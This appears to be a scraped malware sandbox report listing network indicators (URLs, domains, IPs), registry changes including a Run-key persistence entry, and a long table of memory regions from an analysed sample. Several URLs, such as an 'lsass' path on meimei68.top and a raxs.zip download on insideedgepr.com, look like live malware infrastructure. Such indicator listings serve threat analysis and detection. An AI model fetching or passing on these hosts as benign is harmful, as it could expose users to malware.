https://focuslight-www.oss-ap-southeast-1.aliyuncs.com/wp-content/uploads/2024/01/%E8%BF%91%E6%9C%9F%E5%8F%82%E5%B1%95%E4%BF%A1%E6%81%AFEN.jpg
|
47.79.48.222
|
||
|
https://meimei68.top/lsass/index.php?fHYWBUn3
|
77.83.199.73
|
||
|
http://www.symauth.com/cps0(
|
unknown
|
||
|
https://www.insideedgepr.com/header.phpUZ
|
unknown
|
||
|
http://%s/fakeurl.htm
|
unknown
|
||
|
https://www.insideedgepr.com/header.phpf
|
unknown
|
||
|
https://focuslight-www.oss-ap-southeast-1.aliyuncs.com/wp-content/uploads/2025/03/Global-Optimization-EN-1-scaled.jpg
|
47.79.48.222
|
||
|
https://focuslight-www.oss-ap-southeast-1.aliyuncs.com/wp-content/uploads/2022/12/Focuslight-Advancing-Photonics-Technologies-Around-the-World-1.mp4
|
47.79.48.222
|
||
|
http://crl.thawte.com/ThawteTimestampingCA.crl0
|
unknown
|
||
|
https://focuslight-www.oss-ap-southeast-1.aliyuncs.com/wp-content/uploads/2025/05/LWOP-EN-scaled.jpg
|
47.79.48.222
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://www.symauth.com/rpa00
|
unknown
|
||
|
https://www.insideedgepr.com/raxs.zip?8d21e5f647d81a33c781LOCALAPPDATA=C:
|
unknown
|
||
|
https://www.insideedgepr.com/header.php-oC:
|
unknown
|
||
|
https://focuslight-www.oss-ap-southeast-1.aliyuncs.com/wp-content/uploads/2025/01/2025-2-28-%E6%B6%88%E8%B4%B9%E7%94%B5%E5%AD%90-EN-scaled.jpg
|
47.79.48.222
|
||
|
http://www.netsupportschool.com/tutor-assistant.asp11(
|
unknown
|
||
|
https://www.focuslight.com/
|
|||
|
http://www.focuslight.com/
|
159.138.57.153
|
||
|
http://support.steampowered.com
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://www.netsupportschool.com/tutor-assistant.asp
|
unknown
|
||
|
https://www.insideedgepr.com/raxs.zip?8d21e5f647d81a33c781Y
|
unknown
|
There are 33 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
www.focuslight.com
|
159.138.57.153
|
|
|
|
www.insideedgepr.com
|
unknown
|
|
|
|
dja7ygzgr04yk.cloudfront.net
|
3.168.147.20
|
||
|
tr.lfeeder.com
|
13.249.126.78
|
||
|
ace-project.org
|
162.214.153.12
|
||
|
www.google.com
|
142.251.40.36
|
||
|
focuslight-www.oss-ap-southeast-1.aliyuncs.com
|
47.79.48.222
|
||
|
meimei68.top
|
77.83.199.73
|
||
|
wp.wpenginepowered.com
|
141.193.213.10
|
||
|
sc.lfeeder.com
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
5.252.178.123
|
unknown
|
Moldova Republic of
|
|
|
|
192.168.2.4
|
unknown
|
unknown
|
|
|
|
159.138.57.153
|
www.focuslight.com
|
Singapore
|
|
|
|
3.168.147.20
|
dja7ygzgr04yk.cloudfront.net
|
United States
|
||
|
192.168.2.17
|
unknown
|
unknown
|
||
|
13.249.126.115
|
unknown
|
United States
|
||
|
47.79.48.222
|
focuslight-www.oss-ap-southeast-1.aliyuncs.com
|
United States
|
||
|
142.251.40.36
|
www.google.com
|
United States
|
||
|
141.193.213.10
|
wp.wpenginepowered.com
|
United States
|
||
|
77.83.199.73
|
meimei68.top
|
Lithuania
|
||
|
162.214.153.12
|
ace-project.org
|
United States
|
||
|
13.249.126.78
|
tr.lfeeder.com
|
United States
|
||
|
127.0.0.1
|
unknown
|
unknown
|
There are 3 hidden IPs, click here to show them.
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Program_Cs1
|
There are 6 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
2A60000
|
heap
|
page read and write
|
||
|
70144000
|
unkown
|
page readonly
|
||
|
5C01000
|
trusted library allocation
|
page read and write
|
||
|
3000000
|
heap
|
page read and write
|
||
|
E00000
|
heap
|
page read and write
|
||
|
98C000
|
heap
|
page read and write
|
||
|
4E4E000
|
stack
|
page read and write
|
||
|
754D000
|
stack
|
page read and write
|
||
|
E45000
|
heap
|
page read and write
|
||
|
729B000
|
heap
|
page read and write
|
||
|
EE6000
|
heap
|
page read and write
|
||
|
F90000
|
unkown
|
page readonly
|
||
|
4FE4000
|
trusted library allocation
|
page read and write
|
||
|
55FC000
|
heap
|
page read and write
|
||
|
997000
|
heap
|
page read and write
|
||
|
9AC000
|
heap
|
page read and write
|
||
|
91D000
|
heap
|
page read and write
|
||
|
2A70000
|
heap
|
page read and write
|
||
|
29AA000
|
heap
|
page read and write
|
||
|
70142000
|
unkown
|
page readonly
|
||
|
284E000
|
stack
|
page read and write
|
||
|
860000
|
heap
|
page read and write
|
||
|
E60000
|
heap
|
page read and write
|
||
|
11001000
|
unkown
|
page execute read
|
||
|
947000
|
heap
|
page read and write
|
||
|
2FB8000
|
heap
|
page read and write
|
||
|
945000
|
heap
|
page read and write
|
||
|
993000
|
heap
|
page read and write
|
||
|
112B3000
|
unkown
|
page readonly
|
||
|
2E60000
|
heap
|
page read and write
|
||
|
98E000
|
heap
|
page read and write
|
||
|
2E40000
|
trusted library allocation
|
page read and write
|
||
|
750E000
|
stack
|
page read and write
|
||
|
970000
|
heap
|
page read and write
|
||
|
70120000
|
unkown
|
page readonly
|
||
|
F90000
|
unkown
|
page readonly
|
||
|
949000
|
heap
|
page read and write
|
||
|
11000000
|
unkown
|
page readonly
|
||
|
72CB000
|
heap
|
page read and write
|
||
|
F92000
|
unkown
|
page readonly
|
||
|
E1B000
|
stack
|
page read and write
|
||
|
7600000
|
trusted library allocation
|
page read and write
|
||
|
707E000
|
stack
|
page read and write
|
||
|
72F1000
|
heap
|
page read and write
|
||
|
80CF000
|
stack
|
page read and write
|
||
|
112AC000
|
unkown
|
page readonly
|
||
|
70134000
|
unkown
|
page readonly
|
||
|
111F6000
|
unkown
|
page readonly
|
||
|
6D8B000
|
stack
|
page read and write
|
||
|
7232000
|
trusted library allocation
|
page read and write
|
||
|
F5D000
|
stack
|
page read and write
|
||
|
4A90000
|
heap
|
page read and write
|
||
|
55FE000
|
heap
|
page read and write
|
||
|
AAE000
|
stack
|
page read and write
|
||
|
2A37000
|
stack
|
page read and write
|
||
|
991000
|
heap
|
page read and write
|
||
|
968000
|
heap
|
page read and write
|
||
|
2BDD000
|
stack
|
page read and write
|
||
|
953000
|
heap
|
page read and write
|
||
|
7270000
|
heap
|
page read and write
|
||
|
5521000
|
heap
|
page read and write
|
||
|
9A6000
|
heap
|
page read and write
|
||
|
8AE000
|
stack
|
page read and write
|
||
|
2CA0000
|
heap
|
page read and write
|
||
|
299A000
|
heap
|
page read and write
|
||
|
E40000
|
heap
|
page read and write
|
||
|
3005000
|
heap
|
page read and write
|
||
|
8B0000
|
heap
|
page read and write
|
||
|
98B000
|
heap
|
page read and write
|
||
|
55D6000
|
heap
|
page read and write
|
||
|
9A6000
|
heap
|
page read and write
|
||
|
2A72000
|
heap
|
page read and write
|
||
|
112B3000
|
unkown
|
page readonly
|
||
|
2ED0000
|
heap
|
page read and write
|
||
|
E70000
|
heap
|
page read and write
|
||
|
2963000
|
heap
|
page read and write
|
||
|
55CF000
|
heap
|
page read and write
|
||
|
5C68000
|
trusted library allocation
|
page read and write
|
||
|
70140000
|
unkown
|
page readonly
|
||
|
2D84000
|
heap
|
page read and write
|
||
|
55A2000
|
heap
|
page read and write
|
||
|
5582000
|
heap
|
page read and write
|
||
|
F70000
|
heap
|
page read and write
|
||
|
2A4F000
|
stack
|
page read and write
|
||
|
5C5A000
|
trusted library allocation
|
page read and write
|
||
|
7304000
|
heap
|
page read and write
|
||
|
70104000
|
unkown
|
page read and write
|
||
|
98A000
|
heap
|
page read and write
|
||
|
4B05000
|
heap
|
page execute and read and write
|
||
|
945000
|
heap
|
page read and write
|
||
|
70121000
|
unkown
|
page execute read
|
||
|
F91000
|
unkown
|
page execute read
|
||
|
4950000
|
trusted library allocation
|
page read and write
|
||
|
2B8E000
|
stack
|
page read and write
|
||
|
C30000
|
heap
|
page read and write
|
||
|
5C09000
|
trusted library allocation
|
page read and write
|
||
|
70FE000
|
stack
|
page read and write
|
||
|
70142000
|
unkown
|
page readonly
|
||
|
3130000
|
heap
|
page read and write
|
||
|
993000
|
heap
|
page read and write
|
||
|
70144000
|
unkown
|
page readonly
|
||
|
2B00000
|
heap
|
page read and write
|
||
|
4A80000
|
trusted library allocation
|
page read and write
|
||
|
70051000
|
unkown
|
page execute read
|
||
|
111F6000
|
unkown
|
page readonly
|
||
|
70106000
|
unkown
|
page write copy
|
||
|
55A4000
|
heap
|
page read and write
|
||
|
294E000
|
stack
|
page read and write
|
||
|
8BE000
|
heap
|
page read and write
|
||
|
951000
|
heap
|
page read and write
|
||
|
5530000
|
heap
|
page read and write
|
||
|
98A000
|
heap
|
page read and write
|
||
|
F91000
|
unkown
|
page execute read
|
||
|
70050000
|
unkown
|
page readonly
|
||
|
70104000
|
unkown
|
page read and write
|
||
|
99F000
|
heap
|
page read and write
|
||
|
70126000
|
unkown
|
page read and write
|
||
|
111E1000
|
unkown
|
page read and write
|
||
|
70106000
|
unkown
|
page write copy
|
||
|
946000
|
heap
|
page read and write
|
||
|
75F0000
|
trusted library allocation
|
page read and write
|
||
|
E5E000
|
stack
|
page read and write
|
||
|
55F8000
|
heap
|
page read and write
|
||
|
1129D000
|
unkown
|
page readonly
|
||
|
3140000
|
heap
|
page read and write
|
||
|
2996000
|
heap
|
page read and write
|
||
|
2E24000
|
trusted library allocation
|
page read and write
|
||
|
70141000
|
unkown
|
page execute read
|
||
|
2B9D000
|
stack
|
page read and write
|
||
|
1300000
|
heap
|
page read and write
|
||
|
98C000
|
heap
|
page read and write
|
||
|
4FBE000
|
stack
|
page read and write
|
||
|
53CF000
|
stack
|
page read and write
|
||
|
3690000
|
heap
|
page read and write
|
||
|
3680000
|
heap
|
page read and write
|
||
|
5611000
|
heap
|
page read and write
|
||
|
C39000
|
heap
|
page read and write
|
||
|
DDD000
|
stack
|
page read and write
|
||
|
921000
|
heap
|
page read and write
|
||
|
6C050000
|
unkown
|
page readonly
|
||
|
967000
|
heap
|
page read and write
|
||
|
748E000
|
stack
|
page read and write
|
||
|
5606000
|
heap
|
page read and write
|
||
|
70140000
|
unkown
|
page readonly
|
||
|
7580000
|
trusted library allocation
|
page read and write
|
||
|
F90000
|
unkown
|
page readonly
|
||
|
951000
|
heap
|
page read and write
|
||
|
5582000
|
heap
|
page read and write
|
||
|
2880000
|
heap
|
page read and write
|
||
|
2F10000
|
heap
|
page read and write
|
||
|
7560000
|
trusted library allocation
|
page read and write
|
||
|
112AC000
|
unkown
|
page readonly
|
||
|
8FE000
|
heap
|
page read and write
|
||
|
70126000
|
unkown
|
page read and write
|
||
|
2A60000
|
heap
|
page read and write
|
||
|
949000
|
heap
|
page read and write
|
||
|
55CD000
|
heap
|
page read and write
|
||
|
94C000
|
heap
|
page read and write
|
||
|
4E0F000
|
stack
|
page read and write
|
||
|
F92000
|
unkown
|
page readonly
|
||
|
2A60000
|
remote allocation
|
page read and write
|
||
|
E10000
|
heap
|
page read and write
|
||
|
4952000
|
trusted library allocation
|
page read and write
|
||
|
2995000
|
heap
|
page read and write
|
||
|
D9C000
|
stack
|
page read and write
|
||
|
4A00000
|
heap
|
page readonly
|
||
|
1389000
|
heap
|
page read and write
|
||
|
2940000
|
heap
|
page read and write
|
||
|
70125000
|
unkown
|
page readonly
|
||
|
4C01000
|
trusted library allocation
|
page read and write
|
||
|
3150000
|
heap
|
page read and write
|
||
|
1129D000
|
unkown
|
page readonly
|
||
|
70141000
|
unkown
|
page execute read
|
||
|
7610000
|
trusted library allocation
|
page read and write
|
||
|
745000
|
heap
|
page read and write
|
||
|
954000
|
heap
|
page read and write
|
||
|
5596000
|
heap
|
page read and write
|
||
|
70051000
|
unkown
|
page execute read
|
||
|
7250000
|
heap
|
page read and write
|
||
|
2C5E000
|
stack
|
page read and write
|
||
|
8110000
|
trusted library allocation
|
page read and write
|
||
|
9A0000
|
heap
|
page read and write
|
||
|
F91000
|
unkown
|
page execute read
|
||
|
4955000
|
trusted library allocation
|
page execute and read and write
|
||
|
967000
|
heap
|
page read and write
|
||
|
F7B000
|
stack
|
page read and write
|
||
|
2E8E000
|
stack
|
page read and write
|
||
|
112DE000
|
unkown
|
page readonly
|
||
|
522B000
|
trusted library allocation
|
page read and write
|
||
|
808E000
|
stack
|
page read and write
|
||
|
99F000
|
heap
|
page read and write
|
||
|
91A000
|
heap
|
page read and write
|
||
|
80F0000
|
heap
|
page read and write
|
||
|
70134000
|
unkown
|
page readonly
|
||
|
D80000
|
heap
|
page read and write
|
||
|
5606000
|
heap
|
page read and write
|
||
|
6F0E000
|
stack
|
page read and write
|
||
|
9A7000
|
heap
|
page read and write
|
||
|
55FC000
|
heap
|
page read and write
|
||
|
D2F000
|
stack
|
page read and write
|
||
|
3174000
|
heap
|
page read and write
|
||
|
939000
|
heap
|
page read and write
|
||
|
1381000
|
heap
|
page read and write
|
||
|
2985000
|
heap
|
page read and write
|
||
|
6DCE000
|
stack
|
page read and write
|
||
|
7620000
|
trusted library allocation
|
page read and write
|
||
|
6C7E000
|
stack
|
page read and write
|
||
|
5590000
|
heap
|
page read and write
|
||
|
9A0000
|
heap
|
page read and write
|
||
|
2ECF000
|
stack
|
page read and write
|
||
|
F92000
|
unkown
|
page readonly
|
||
|
11287000
|
unkown
|
page readonly
|
||
|
ADE000
|
stack
|
page read and write
|
||
|
55F5000
|
heap
|
page read and write
|
||
|
1132A000
|
unkown
|
page readonly
|
||
|
8020000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A70000
|
heap
|
page read and write
|
||
|
6C09A000
|
unkown
|
page read and write
|
||
|
3170000
|
heap
|
page read and write
|
||
|
F92000
|
unkown
|
page readonly
|
||
|
5153000
|
trusted library allocation
|
page read and write
|
||
|
96B000
|
heap
|
page read and write
|
||
|
C39000
|
heap
|
page read and write
|
||
|
2A54000
|
heap
|
page read and write
|
||
|
954000
|
heap
|
page read and write
|
||
|
70109000
|
unkown
|
page readonly
|
||
|
993000
|
heap
|
page read and write
|
||
|
2996000
|
heap
|
page read and write
|
||
|
2985000
|
heap
|
page read and write
|
||
|
8030000
|
trusted library allocation
|
page read and write
|
||
|
6C0A0000
|
unkown
|
page readonly
|
||
|
49BE000
|
stack
|
page read and write
|
||
|
2E60000
|
heap
|
page read and write
|
||
|
284E000
|
stack
|
page read and write
|
||
|
4A18000
|
trusted library allocation
|
page read and write
|
||
|
EEB000
|
stack
|
page read and write
|
||
|
2960000
|
heap
|
page read and write
|
||
|
EE0000
|
heap
|
page read and write
|
||
|
337E000
|
stack
|
page read and write
|
||
|
4970000
|
trusted library allocation
|
page read and write
|
||
|
639000
|
stack
|
page read and write
|
||
|
70134000
|
unkown
|
page readonly
|
||
|
EDE000
|
stack
|
page read and write
|
||
|
2A50000
|
heap
|
page read and write
|
||
|
112AC000
|
unkown
|
page readonly
|
||
|
29C3000
|
heap
|
page read and write
|
||
|
921000
|
heap
|
page read and write
|
||
|
967000
|
heap
|
page read and write
|
||
|
55C4000
|
heap
|
page read and write
|
||
|
9C0000
|
heap
|
page read and write
|
||
|
111F0000
|
unkown
|
page read and write
|
||
|
70143000
|
unkown
|
page read and write
|
||
|
2E20000
|
trusted library allocation
|
page read and write
|
||
|
55E6000
|
heap
|
page read and write
|
||
|
309A000
|
stack
|
page read and write
|
||
|
1600000
|
heap
|
page read and write
|
||
|
70106000
|
unkown
|
page write copy
|
||
|
949000
|
heap
|
page read and write
|
||
|
520A000
|
trusted library allocation
|
page read and write
|
||
|
2E67000
|
heap
|
page read and write
|
||
|
2C9F000
|
stack
|
page read and write
|
||
|
E68000
|
heap
|
page read and write
|
||
|
5608000
|
heap
|
page read and write
|
||
|
946000
|
heap
|
page read and write
|
||
|
F90000
|
unkown
|
page readonly
|
||
|
1125C000
|
unkown
|
page readonly
|
||
|
1389000
|
heap
|
page read and write
|
||
|
72DA000
|
heap
|
page read and write
|
||
|
6C099000
|
unkown
|
page write copy
|
||
|
9A7000
|
heap
|
page read and write
|
||
|
F92000
|
unkown
|
page readonly
|
||
|
73B000
|
stack
|
page read and write
|
||
|
98C000
|
heap
|
page read and write
|
||
|
C18000
|
heap
|
page read and write
|
||
|
8BA000
|
heap
|
page read and write
|
||
|
70109000
|
unkown
|
page readonly
|
||
|
55E5000
|
heap
|
page read and write
|
||
|
E80000
|
heap
|
page read and write
|
||
|
2D29000
|
heap
|
page read and write
|
||
|
2A60000
|
remote allocation
|
page read and write
|
||
|
2A50000
|
heap
|
page read and write
|
||
|
98B000
|
heap
|
page read and write
|
||
|
2DD0000
|
heap
|
page read and write
|
||
|
29C3000
|
heap
|
page read and write
|
||
|
70140000
|
unkown
|
page readonly
|
||
|
7630000
|
trusted library allocation
|
page read and write
|
||
|
55C7000
|
heap
|
page read and write
|
||
|
70141000
|
unkown
|
page execute read
|
||
|
4A10000
|
trusted library allocation
|
page read and write
|
||
|
6D4D000
|
stack
|
page read and write
|
||
|
5564000
|
heap
|
page read and write
|
||
|
954000
|
heap
|
page read and write
|
||
|
52CE000
|
stack
|
page read and write
|
||
|
953000
|
heap
|
page read and write
|
||
|
5610000
|
heap
|
page read and write
|
||
|
7100000
|
heap
|
page read and write
|
||
|
111E1000
|
unkown
|
page read and write
|
||
|
4A70000
|
trusted library allocation
|
page execute and read and write
|
||
|
703E000
|
stack
|
page read and write
|
||
|
7640000
|
trusted library allocation
|
page read and write
|
||
|
2885000
|
heap
|
page read and write
|
||
|
112B3000
|
unkown
|
page readonly
|
||
|
2E23000
|
trusted library allocation
|
page execute and read and write
|
||
|
2F9F000
|
stack
|
page read and write
|
||
|
1125C000
|
unkown
|
page readonly
|
||
|
4ADE000
|
stack
|
page read and write
|
||
|
5510000
|
heap
|
page read and write
|
||
|
72C4000
|
heap
|
page read and write
|
||
|
F70000
|
heap
|
page read and write
|
||
|
51FE000
|
stack
|
page read and write
|
||
|
55F7000
|
heap
|
page read and write
|
||
|
55A5000
|
heap
|
page read and write
|
||
|
F3E000
|
stack
|
page read and write
|
||
|
27FC000
|
stack
|
page read and write
|
||
|
5200000
|
unclassified section
|
page read and write
|
||
|
6E8A000
|
stack
|
page read and write
|
||
|
9A3000
|
heap
|
page read and write
|
||
|
AE5000
|
heap
|
page read and write
|
||
|
55A2000
|
heap
|
page read and write
|
||
|
526C000
|
trusted library allocation
|
page read and write
|
||
|
55CF000
|
heap
|
page read and write
|
||
|
91A000
|
heap
|
page read and write
|
||
|
75E0000
|
trusted library allocation
|
page read and write
|
||
|
4D55000
|
trusted library allocation
|
page read and write
|
||
|
998000
|
heap
|
page read and write
|
||
|
8100000
|
heap
|
page read and write
|
||
|
96C000
|
heap
|
page read and write
|
||
|
2DCA000
|
heap
|
page read and write
|
||
|
4C5E000
|
trusted library allocation
|
page read and write
|
||
|
70125000
|
unkown
|
page readonly
|
||
|
F90000
|
unkown
|
page readonly
|
||
|
28FD000
|
stack
|
page read and write
|
||
|
111F6000
|
unkown
|
page readonly
|
||
|
11000000
|
unkown
|
page readonly
|
||
|
F50000
|
heap
|
page read and write
|
||
|
4E74000
|
trusted library allocation
|
page read and write
|
||
|
75D0000
|
trusted library allocation
|
page read and write
|
||
|
70104000
|
unkown
|
page read and write
|
||
|
C2D000
|
heap
|
page read and write
|
||
|
94C000
|
heap
|
page read and write
|
||
|
94C000
|
heap
|
page read and write
|
||
|
2D5F000
|
heap
|
page read and write
|
||
|
F91000
|
unkown
|
page execute read
|
||
|
70142000
|
unkown
|
page readonly
|
||
|
5C29000
|
trusted library allocation
|
page read and write
|
||
|
2A60000
|
remote allocation
|
page read and write
|
||
|
2950000
|
heap
|
page read and write
|
||
|
95C000
|
stack
|
page read and write
|
||
|
11000000
|
unkown
|
page readonly
|
||
|
29AA000
|
heap
|
page read and write
|
||
|
7329000
|
heap
|
page read and write
|
||
|
5563000
|
heap
|
page read and write
|
||
|
2AFE000
|
stack
|
page read and write
|
||
|
9A5000
|
heap
|
page read and write
|
||
|
85C000
|
stack
|
page read and write
|
||
|
70125000
|
unkown
|
page readonly
|
||
|
98B000
|
heap
|
page read and write
|
||
|
7315000
|
heap
|
page read and write
|
||
|
6C09E000
|
unkown
|
page read and write
|
||
|
4B8E000
|
stack
|
page read and write
|
||
|
135B000
|
stack
|
page read and write
|
||
|
9A4000
|
heap
|
page read and write
|
||
|
944000
|
heap
|
page read and write
|
||
|
924000
|
heap
|
page read and write
|
||
|
11287000
|
unkown
|
page readonly
|
||
|
2A70000
|
heap
|
page read and write
|
||
|
55CE000
|
heap
|
page read and write
|
||
|
726C000
|
heap
|
page read and write
|
||
|
4BCE000
|
stack
|
page read and write
|
||
|
BF0000
|
heap
|
page read and write
|
||
|
70120000
|
unkown
|
page readonly
|
||
|
70143000
|
unkown
|
page read and write
|
||
|
6E4E000
|
stack
|
page read and write
|
||
|
4B4E000
|
stack
|
page read and write
|
||
|
55C4000
|
heap
|
page read and write
|
||
|
55E8000
|
heap
|
page read and write
|
||
|
4E53000
|
trusted library allocation
|
page read and write
|
||
|
70050000
|
unkown
|
page readonly
|
||
|
7240000
|
heap
|
page execute and read and write
|
||
|
9A8000
|
heap
|
page read and write
|
||
|
99B000
|
heap
|
page read and write
|
||
|
70144000
|
unkown
|
page readonly
|
||
|
11001000
|
unkown
|
page execute read
|
||
|
941000
|
heap
|
page read and write
|
||
|
7570000
|
trusted library allocation
|
page execute and read and write
|
||
|
6F4E000
|
stack
|
page read and write
|
||
|
11193000
|
unkown
|
page readonly
|
||
|
2F5E000
|
stack
|
page read and write
|
||
|
2CD0000
|
heap
|
page read and write
|
||
|
9A5000
|
heap
|
page read and write
|
||
|
5541000
|
heap
|
page read and write
|
||
|
4F4F000
|
stack
|
page read and write
|
||
|
7325000
|
heap
|
page read and write
|
||
|
6C3E000
|
stack
|
page read and write
|
||
|
2D7F000
|
heap
|
page read and write
|
||
|
9A4000
|
heap
|
page read and write
|
||
|
30E0000
|
heap
|
page read and write
|
||
|
16C0000
|
heap
|
page read and write
|
||
|
F91000
|
unkown
|
page execute read
|
||
|
2FB0000
|
heap
|
page read and write
|
||
|
4F2C000
|
trusted library allocation
|
page read and write
|
||
|
111F0000
|
unkown
|
page read and write
|
||
|
111E1000
|
unkown
|
page read and write
|
||
|
D60000
|
heap
|
page read and write
|
||
|
970000
|
heap
|
page read and write
|
||
|
951000
|
heap
|
page read and write
|
||
|
4B00000
|
heap
|
page execute and read and write
|
||
|
2C1D000
|
stack
|
page read and write
|
||
|
1360000
|
heap
|
page read and write
|
||
|
AEE000
|
stack
|
page read and write
|
||
|
55C4000
|
heap
|
page read and write
|
||
|
98A000
|
heap
|
page read and write
|
||
|
70143000
|
unkown
|
page read and write
|
||
|
E5F000
|
stack
|
page read and write
|
||
|
70121000
|
unkown
|
page execute read
|
||
|
9A7000
|
heap
|
page read and write
|
||
|
6C090000
|
unkown
|
page readonly
|
||
|
2CCE000
|
stack
|
page read and write
|
||
|
2DCE000
|
stack
|
page read and write
|
||
|
C10000
|
heap
|
page read and write
|
||
|
2A75000
|
heap
|
page read and write
|
||
|
2F6E000
|
stack
|
page read and write
|
||
|
1125C000
|
unkown
|
page readonly
|
||
|
155F000
|
stack
|
page read and write
|
||
|
2B06000
|
heap
|
page read and write
|
||
|
4BF0000
|
heap
|
page execute and read and write
|
||
|
4A6C000
|
stack
|
page read and write
|
||
|
740000
|
heap
|
page read and write
|
||
|
F91000
|
unkown
|
page execute read
|
||
|
917000
|
heap
|
page read and write
|
||
|
2A63000
|
heap
|
page read and write
|
||
|
7230000
|
trusted library allocation
|
page read and write
|
||
|
314D000
|
stack
|
page read and write
|
||
|
6C051000
|
unkown
|
page execute read
|
||
|
2E30000
|
heap
|
page read and write
|
||
|
5582000
|
heap
|
page read and write
|
||
|
912000
|
heap
|
page read and write
|
||
|
55D2000
|
heap
|
page read and write
|
||
|
2E49000
|
trusted library allocation
|
page read and write
|
||
|
7361000
|
heap
|
page read and write
|
||
|
75A0000
|
trusted library allocation
|
page read and write
|
||
|
E65000
|
heap
|
page read and write
|
||
|
111F0000
|
unkown
|
page read and write
|
||
|
70126000
|
unkown
|
page read and write
|
||
|
2985000
|
heap
|
page read and write
|
||
|
C9C000
|
stack
|
page read and write
|
||
|
6E0E000
|
stack
|
page read and write
|
||
|
70BE000
|
stack
|
page read and write
|
||
|
2E40000
|
heap
|
page read and write
|
||
|
2E10000
|
trusted library allocation
|
page read and write
|
||
|
96C000
|
heap
|
page read and write
|
||
|
55C4000
|
heap
|
page read and write
|
||
|
993000
|
heap
|
page read and write
|
||
|
70051000
|
unkown
|
page execute read
|
||
|
6ECE000
|
stack
|
page read and write
|
||
|
296C000
|
heap
|
page read and write
|
||
|
98F000
|
heap
|
page read and write
|
||
|
2F9F000
|
stack
|
page read and write
|
||
|
70120000
|
unkown
|
page readonly
|
||
|
5585000
|
heap
|
page read and write
|
||
|
112DE000
|
unkown
|
page readonly
|
||
|
11001000
|
unkown
|
page execute read
|
||
|
74CE000
|
stack
|
page read and write
|
||
|
BEE000
|
stack
|
page read and write
|
||
|
2CF0000
|
heap
|
page read and write
|
||
|
2D6A000
|
heap
|
page read and write
|
||
|
327A000
|
stack
|
page read and write
|
||
|
25DD000
|
stack
|
page read and write
|
||
|
49FE000
|
stack
|
page read and write
|
||
|
8120000
|
trusted library allocation
|
page execute and read and write
|
||
|
1132A000
|
unkown
|
page readonly
|
||
|
50BF000
|
stack
|
page read and write
|
||
|
2E2D000
|
trusted library allocation
|
page execute and read and write
|
||
|
11193000
|
unkown
|
page readonly
|
||
|
2D1B000
|
heap
|
page read and write
|
||
|
F90000
|
unkown
|
page readonly
|
||
|
2C8F000
|
stack
|
page read and write
|
||
|
9A0000
|
heap
|
page read and write
|
||
|
C2E000
|
stack
|
page read and write
|
||
|
11193000
|
unkown
|
page readonly
|
||
|
72DF000
|
heap
|
page read and write
|
||
|
2D5D000
|
heap
|
page read and write
|
||
|
4CCE000
|
stack
|
page read and write
|
||
|
1368000
|
heap
|
page read and write
|
||
|
944000
|
heap
|
page read and write
|
||
|
70050000
|
unkown
|
page readonly
|
||
|
509B000
|
trusted library allocation
|
page read and write
|
||
|
4D0E000
|
stack
|
page read and write
|
||
|
5590000
|
heap
|
page read and write
|
||
|
AE0000
|
heap
|
page read and write
|
||
|
75C0000
|
trusted library allocation
|
page read and write
|
||
|
55E6000
|
heap
|
page read and write
|
||
|
2958000
|
heap
|
page read and write
|
||
|
3240000
|
heap
|
page read and write
|
||
|
98E000
|
heap
|
page read and write
|
||
|
8040000
|
trusted library allocation
|
page read and write
|
||
|
75B0000
|
trusted library allocation
|
page read and write
|
||
|
5596000
|
heap
|
page read and write
|
||
|
70121000
|
unkown
|
page execute read
|
||
|
9A6000
|
heap
|
page read and write
|
||
|
6CBF000
|
stack
|
page read and write
|
||
|
30DE000
|
stack
|
page read and write
|
||
|
12FE000
|
stack
|
page read and write
|
||
|
951000
|
heap
|
page read and write
|
||
|
D5E000
|
stack
|
page read and write
|
||
|
951000
|
heap
|
page read and write
|
||
|
FEE000
|
stack
|
page read and write
|
||
|
1129D000
|
unkown
|
page readonly
|
||
|
7590000
|
trusted library allocation
|
page read and write
|
||
|
50FE000
|
stack
|
page read and write
|
||
